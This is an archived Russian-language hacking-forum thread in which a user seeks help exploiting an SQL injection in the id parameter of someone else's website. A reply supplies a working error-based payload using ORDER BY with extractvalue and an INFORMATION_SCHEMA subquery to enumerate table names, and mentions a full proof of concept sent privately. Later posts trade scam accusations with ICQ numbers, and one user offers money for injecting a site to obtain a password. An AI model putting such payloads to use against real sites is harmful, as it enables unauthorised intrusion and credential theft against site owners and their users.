PDA

Просмотр полной версии : SQL - injection.

elvir
19.03.2017, 13:09
Нужна помощь: есть сайт вида http://xxxx/?r=club/catalog/detail&id=12при подстановки ковычки id=12' вылазит следующая ошибка:

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = 201703' at line 1

при попытки подобрать кол-во столбцов http://xxxx/?r=club/catalog/detail&id=12+order+by+1+--+ (или http://xxxx/?r=club/catalog/detail&id=12+order+by+1000+--+)появляется такая ошибка:

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S22]: Column not found: 1054 Unknown column '1' in 'order clause'

пробовал и - ставит впереди 12, и ковычку после 12 и делать запрос, всё равно не могу понять в чём проблема. Может кто подскажет, или как в SQLmape раскрутить, я так понял уязвимый параметр id.
SooLFaa
19.03.2017, 14:08
Таргет в лс. А вообще смотри на саму ошибку где ругается. В первом случае потеряна кавычка у строки '' AND date = [Вот здесь]201703' или наоборот последняя лишняяВо втором случае оператор order by считает 1 текстовой строкой.
SooLFaa
19.03.2017, 14:36
Как обычно полный РоС выслал в ЛС. А если кому интересно то решается еррор бэйседом в ордер бай.


Code:
site.ru/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database() LIMIT 1,1))) -- -

http://s019.radikal.ru/i637/1703/7f/e59c47309ed8.jpg
because
27.03.2017, 00:45
ТС, КИДАЛА!!!

БУДЬТЕ ОСТОРОЖНЫ!
SooLFaa
27.03.2017, 00:54
because said:
↑ (https://antichat.live/posts/4065362/)
ТС, КИДАЛА!!!

БУДЬТЕ ОСТОРОЖНЫ!


Интересно в чем же? Он ничего не обещал
because
27.03.2017, 00:55
SooLFaa said:
↑ (https://antichat.live/posts/4065364/)
Интересно в чем же? Он ничего не обещал


К этой теме не относится, товар продавал и после перевода сразу пропал.
SooLFaa
27.03.2017, 00:56
because said:
↑ (https://antichat.live/posts/4065365/)
К этой теме не относится, товар продавал и после перевода сразу пропал.


Интересно на пруфы взглянуть. Ну а так, за такое модеры обычно банят.
because
27.03.2017, 01:02
SooLFaa said:
↑ (https://antichat.live/posts/4065366/)
Интересно на пруфы взглянуть. Ну а так, за такое модеры обычно банят.


Суи уже отписал)

На 500р кинул

ICQ - 712024700

ICQ - 707394583

Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)
SooLFaa
27.03.2017, 02:07
because said:
↑ (https://antichat.live/posts/4065367/)
Суи уже отписал)
На 500р кинул
ICQ - 712024700
ICQ - 707394583
Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар
Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)


Бывает
tochka_zrenia
27.07.2017, 15:43
Ищу специалиста, проверить сайт на уязвимость типа sql injection с последующим получением пароля $$$

пишите в личку
erwerr2321
27.07.2017, 16:29
tochka_zrenia said:
↑ (https://antichat.live/posts/4110506/)
Ищу специалиста, проверить сайт на уязвимость типа sql injection с последующим получением пароля $$$
пишите в личку


А сайтик то чей?

Твой?